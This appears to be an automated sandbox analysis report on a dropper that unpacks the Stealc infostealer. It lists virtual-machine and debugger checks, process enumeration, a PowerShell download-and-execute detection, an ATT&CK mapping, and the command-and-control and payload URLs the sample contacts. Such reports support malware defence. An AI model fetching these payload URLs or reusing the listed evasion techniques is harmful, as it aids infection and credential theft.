Source: 7gxaFDUSOD.exe, 00000000.00000002.3887769418.00000000009E6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW0
Source: Amcache.hve.7.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.7.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.7.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: 7gxaFDUSOD.exe, 00000000.00000002.3887769418.0000000000A4C000.00000004.00000020.00020000.00000000.sdmp, 4CC1.tmp.exe, 00000003.00000002.1975546939.0000000000972000.00000004.00000020.00020000.00000000.sdmp, 4CC1.tmp.exe, 00000003.00000002.1975546939.0000000000909000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.7.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.7.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.7.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.7.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.7.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.7.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.7.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: 4CC1.tmp.exe, 00000003.00000002.1975524031.00000000008EA000.00000040.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware\
Source: Amcache.hve.7.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.7.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.7.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.7.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.7.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: 4CC1.tmp.exe, 00000003.00000002.1975524031.00000000008EA000.00000040.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: Amcache.hve.7.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.7.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.7.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.7.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.7.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.7.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.7.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.7.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\AppData\Local\Temp\4CC1.tmp.exe

API call chain: ExitProcess graph end node

graph_3-34142

Source: C:\Users\user\AppData\Local\Temp\4CC1.tmp.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\4CC1.tmp.exe

Code function: 3_2_00404980 lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,GetProcessHeap,RtlAllocateHeap,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,LdrInitializeThunk,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,VirtualProtect,

3_2_00404980

Source: C:\Users\user\Desktop\7gxaFDUSOD.exe

Code function: 0_2_0042A3D3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_0042A3D3

Source: C:\Users\user\AppData\Local\Temp\4CC1.tmp.exe

Code function: 3_2_00404980 VirtualProtect 00000000,00000004,00000100,?

3_2_00404980

Source: C:\Users\user\Desktop\7gxaFDUSOD.exe

Code function: 0_2_0041EC5E LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_0041EC5E

Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Code function: 0_2_0042FE5F mov eax, dword ptr fs:[00000030h]	0_2_0042FE5F
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Code function: 0_2_009A9893 push dword ptr fs:[00000030h]	0_2_009A9893
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Code function: 0_2_024A00C6 mov eax, dword ptr fs:[00000030h]	0_2_024A00C6
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Code function: 0_2_0247092B mov eax, dword ptr fs:[00000030h]	0_2_0247092B
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Code function: 0_2_02470D90 mov eax, dword ptr fs:[00000030h]	0_2_02470D90
Source: C:\Users\user\AppData\Local\Temp\4CC1.tmp.exe	Code function: 3_2_004263C0 mov eax, dword ptr fs:[00000030h]	3_2_004263C0
Source: C:\Users\user\AppData\Local\Temp\4CC1.tmp.exe	Code function: 3_2_008EAA33 push dword ptr fs:[00000030h]	3_2_008EAA33
Source: C:\Users\user\AppData\Local\Temp\4CC1.tmp.exe	Code function: 3_2_02476627 mov eax, dword ptr fs:[00000030h]	3_2_02476627
Source: C:\Users\user\AppData\Local\Temp\4CC1.tmp.exe	Code function: 3_2_0245092B mov eax, dword ptr fs:[00000030h]	3_2_0245092B
Source: C:\Users\user\AppData\Local\Temp\4CC1.tmp.exe	Code function: 3_2_02450D90 mov eax, dword ptr fs:[00000030h]	3_2_02450D90

Source: C:\Users\user\Desktop\7gxaFDUSOD.exe

Code function: 0_2_0043BBC1 GetProcessHeap,

0_2_0043BBC1

Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Code function: 0_2_0042A3D3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0042A3D3
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Code function: 0_2_004104D3 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_004104D3
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Code function: 0_2_00410666 SetUnhandledExceptionFilter,	0_2_00410666
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Code function: 0_2_0040F911 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0040F911
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Code function: 0_2_0249A63A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0249A63A
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Code function: 0_2_0248073A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0248073A
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Code function: 0_2_0247FB78 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0247FB78
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Code function: 0_2_024808CD SetUnhandledExceptionFilter,	0_2_024808CD
Source: C:\Users\user\AppData\Local\Temp\4CC1.tmp.exe	Code function: 3_2_02479A10 SetUnhandledExceptionFilter,	3_2_02479A10
Source: C:\Users\user\AppData\Local\Temp\4CC1.tmp.exe	Code function: 3_2_02477E31 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_02477E31
Source: C:\Users\user\AppData\Local\Temp\4CC1.tmp.exe	Code function: 3_2_0247784F memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_0247784F

Source: C:\Users\user\AppData\Local\Temp\4CC1.tmp.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: 4CC1.tmp.exe PID: 3628, type: MEMORYSTR

Searches for specific processes (likely to inject)

Source: C:\Users\user\AppData\Local\Temp\4CC1.tmp.exe	Code function: 3_2_004246C0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle,	3_2_004246C0
Source: C:\Users\user\AppData\Local\Temp\4CC1.tmp.exe	Code function: 3_2_02474897 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,Process32Next,CloseHandle,	3_2_02474897
Source: C:\Users\user\AppData\Local\Temp\4CC1.tmp.exe	Code function: 3_2_02474927 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle,	3_2_02474927

Source: C:\Users\user\Desktop\7gxaFDUSOD.exe

Process created: C:\Users\user\AppData\Local\Temp\4CC1.tmp.exe "C:\Users\user\AppData\Local\Temp\4CC1.tmp.exe"

Jump to behavior

Source: C:\Users\user\Desktop\7gxaFDUSOD.exe

Code function: 0_2_0041077B cpuid

0_2_0041077B

Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	0_2_0043B00A
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Code function: GetLocaleInfoW,	0_2_004351C0
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Code function: EnumSystemLocalesW,	0_2_0043B2CD
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Code function: EnumSystemLocalesW,	0_2_0043B282
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Code function: EnumSystemLocalesW,	0_2_0043B368
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	0_2_0043B3F5
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Code function: GetLocaleInfoW,	0_2_0043B645
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_0043B76E
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Code function: GetLocaleInfoW,	0_2_0043B875
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_0043B942
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Code function: EnumSystemLocalesW,	0_2_00434DCD
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	0_2_024AB271
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Code function: EnumSystemLocalesW,	0_2_024A5034
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Code function: GetLocaleInfoW,	0_2_024A5427
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Code function: EnumSystemLocalesW,	0_2_024AB4E9
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Code function: EnumSystemLocalesW,	0_2_024AB534
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Code function: EnumSystemLocalesW,	0_2_024AB5CF
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Code function: GetLocaleInfoW,	0_2_024ABADC
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_024ABBA9
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Code function: GetLocaleInfoW,	0_2_024AB8AC
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Code function: GetLocaleInfoW,	0_2_024AB8A3
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_024AB9D5
Source: C:\Users\user\AppData\Local\Temp\4CC1.tmp.exe	Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,	3_2_02472F67

Source: C:\Users\user\AppData\Local\Temp\4CC1.tmp.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4CC1.tmp.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\4CC1.tmp.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4CC1.tmp.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\7gxaFDUSOD.exe

Code function: 0_2_004103CD GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_004103CD

Source: C:\Users\user\AppData\Local\Temp\4CC1.tmp.exe

Code function: 3_2_004229E0 GetProcessHeap,HeapAlloc,GetUserNameA,

3_2_004229E0

Source: C:\Users\user\AppData\Local\Temp\4CC1.tmp.exe

Code function: 3_2_02472E17 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,

3_2_02472E17

Source: C:\Users\user\Desktop\7gxaFDUSOD.exe

Code function: 0_2_004163EA GetVersionExW,Concurrency::details::platform::InitializeSystemFunctionPointers,Concurrency::details::WinRT::Initialize,__CxxThrowException@8,

0_2_004163EA

Source: Amcache.hve.7.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.7.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.7.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.7.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.7.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected Stealc

Source: Yara match	File source: 3.3.4CC1.tmp.exe.2490000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.4CC1.tmp.exe.2490000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.4CC1.tmp.exe.2450e67.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.4CC1.tmp.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.4CC1.tmp.exe.2450e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.4CC1.tmp.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.1974878121.0000000000540000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1974878121.000000000055B000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1974878121.0000000000596000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.1537789026.0000000002490000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1975546939.0000000000909000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1974878121.000000000044B000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1974878121.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1975683991.0000000002450000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 4CC1.tmp.exe PID: 3628, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Remote Access Functionality

Yara detected Stealc

Source: Yara match	File source: 3.3.4CC1.tmp.exe.2490000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.4CC1.tmp.exe.2490000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.4CC1.tmp.exe.2450e67.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.4CC1.tmp.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.4CC1.tmp.exe.2450e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.4CC1.tmp.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.1974878121.0000000000540000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1974878121.000000000055B000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1974878121.0000000000596000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.1537789026.0000000002490000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1975546939.0000000000909000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1974878121.000000000044B000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1974878121.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1975683991.0000000002450000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 4CC1.tmp.exe PID: 3628, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Code function: 0_2_004218CC Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::InternalContextBase::SwitchOut,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::InternalContextBase::SwitchTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,	0_2_004218CC
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Code function: 0_2_00420BF6 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,	0_2_00420BF6
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Code function: 0_2_02491B33 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::InternalContextBase::SwitchOut,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::InternalContextBase::SwitchTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,	0_2_02491B33
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Code function: 0_2_02490E5D Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,	0_2_02490E5D

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Native API	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	12 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 Create Account	111 Process Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	3 Clipboard Data	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	3 Obfuscated Files or Information	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	22 Software Packing	NTDS	44 System Information Discovery	Distributed Component Object Model	Input Capture	114 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	1 Query Registry	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	131 Security Software Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Virtualization/Sandbox Evasion	DCSync	1 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	111 Process Injection	Proc Filesystem	12 Process Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	HTML Smuggling	/etc/passwd and /etc/shadow	1 Application Window Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	Dynamic API Resolution	Network Sniffing	1 System Owner/User Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
7gxaFDUSOD.exe	47%	ReversingLabs
7gxaFDUSOD.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\4CC1.tmp.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\4CC1.tmp.exe	53%	ReversingLabs

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://92.255.57.89/45c616e921a794b8.php3	100%	Avira URL Cloud	malware
http://92.255.57.89IDGHJE	0%	Avira URL Cloud	safe
http://92.255.57.89/45c616e921a794b8.phpG0	100%	Avira URL Cloud	malware
http://92.255.57.89/697b92cb4e247842/sqlite3.dllexe	100%	Avira URL Cloud	malware
http://92.255.57.89	100%	Avira URL Cloud	malware
http://176.113.115.19/ScreenUpdateSync.exe5rjtejk5rytrrSOFTWARE	0%	Avira URL Cloud	safe
http://92.255.57.89/45c616e921a794b8.php8(	100%	Avira URL Cloud	malware
http://92.255.57.89/45c616e921a794b8.php	100%	Avira URL Cloud	malware
http://92.255.57.89smss.exe	0%	Avira URL Cloud	safe
http://92.255.57.89/697b92cb4e247842/sqlite3.dllll	100%	Avira URL Cloud	malware
http://92.255.57.89/	100%	Avira URL Cloud	malware
http://92.255.57.89/697b92cb4e247842/sqlite3.dllll#	100%	Avira URL Cloud	malware
http://92.255.57.89s	0%	Avira URL Cloud	safe
http://92.255.57.89/45c616e921a794b8.phpwininit.exe	100%	Avira URL Cloud	malware
http://92.255.57.89/697b92cb4e247842/sqlite3.dll	100%	Avira URL Cloud	malware
http://92.255.57.899	0%	Avira URL Cloud	safe
http://176.113.115.19/ScreenUpdateSync.exe	0%	Avira URL Cloud	safe
http://92.255.57.89/697b92cb4e247842/sqlite3.dll3g	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
post-to-me.com	104.21.56.70	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://92.255.57.89/45c616e921a794b8.php	true	Avira URL Cloud: malware	unknown
https://post-to-me.com/track_prt.php?sub=0&cc=DE	false		high
http://92.255.57.89/	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://92.255.57.89/697b92cb4e247842/sqlite3.dllll	4CC1.tmp.exe, 00000003.00000002.1975546939.0000000000948000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://post-to-me.com/track_prt.php?sub=&cc=DE	7gxaFDUSOD.exe, 00000000.00000002.3887397699.0000000000400000.00000040.00000001.01000000.00000003.sdmp	false		high
http://176.113.115.19/ScreenUpdateSync.exe5rjtejk5rytrrSOFTWARE	7gxaFDUSOD.exe, 00000000.00000002.3887397699.0000000000400000.00000040.00000001.01000000.00000003.sdmp	false	Avira URL Cloud: safe	unknown
http://92.255.57.89	4CC1.tmp.exe, 00000003.00000002.1975546939.0000000000909000.00000004.00000020.00020000.00000000.sdmp, 4CC1.tmp.exe, 00000003.00000002.1975471627.00000000008DE000.00000004.00000020.00020000.00000000.sdmp, 4CC1.tmp.exe, 00000003.00000002.1974878121.000000000044B000.00000040.00000001.01000000.00000005.sdmp, 4CC1.tmp.exe, 00000003.00000002.1975546939.0000000000966000.00000004.00000020.00020000.00000000.sdmp, 4CC1.tmp.exe, 00000003.00000002.1974878121.00000000004AF000.00000040.00000001.01000000.00000005.sdmp	true	Avira URL Cloud: malware	unknown
http://92.255.57.89/697b92cb4e247842/sqlite3.dllexe	4CC1.tmp.exe, 00000003.00000002.1974878121.000000000044B000.00000040.00000001.01000000.00000005.sdmp	false	Avira URL Cloud: malware	unknown
http://92.255.57.89IDGHJE	4CC1.tmp.exe, 00000003.00000002.1974878121.00000000004AF000.00000040.00000001.01000000.00000005.sdmp	false	Avira URL Cloud: safe	unknown
http://92.255.57.89smss.exe	4CC1.tmp.exe, 00000003.00000002.1974878121.000000000044B000.00000040.00000001.01000000.00000005.sdmp	false	Avira URL Cloud: safe	unknown
https://post-to-me.com/track_prt.php?sub=	7gxaFDUSOD.exe	false		high
http://92.255.57.89/45c616e921a794b8.php8(	4CC1.tmp.exe, 00000003.00000002.1975546939.0000000000948000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://92.255.57.89/45c616e921a794b8.php3	4CC1.tmp.exe, 00000003.00000002.1975546939.0000000000948000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://crl.microsoft	7gxaFDUSOD.exe, 00000000.00000003.1505596518.0000000003175000.00000004.00000020.00020000.00000000.sdmp, 7gxaFDUSOD.exe, 00000000.00000003.1809637832.0000000003175000.00000004.00000020.00020000.00000000.sdmp, 7gxaFDUSOD.exe, 00000000.00000003.1480766151.0000000003175000.00000004.00000020.00020000.00000000.sdmp	false		high
http://92.255.57.89/45c616e921a794b8.phpG0	4CC1.tmp.exe, 00000003.00000002.1975546939.0000000000940000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://92.255.57.89/45c616e921a794b8.phpwininit.exe	4CC1.tmp.exe, 00000003.00000002.1974878121.000000000044B000.00000040.00000001.01000000.00000005.sdmp	false	Avira URL Cloud: malware	unknown
https://post-to-me.com/	7gxaFDUSOD.exe, 00000000.00000002.3887769418.0000000000A1A000.00000004.00000020.00020000.00000000.sdmp	false		high
http://upx.sf.net	Amcache.hve.7.dr	false		high
http://92.255.57.89/697b92cb4e247842/sqlite3.dllll#	4CC1.tmp.exe, 00000003.00000002.1975546939.0000000000948000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://92.255.57.89s	4CC1.tmp.exe, 00000003.00000002.1975471627.00000000008DE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://92.255.57.89/697b92cb4e247842/sqlite3.dll	4CC1.tmp.exe, 00000003.00000002.1974878121.000000000044B000.00000040.00000001.01000000.00000005.sdmp, 4CC1.tmp.exe, 00000003.00000002.1975546939.0000000000966000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
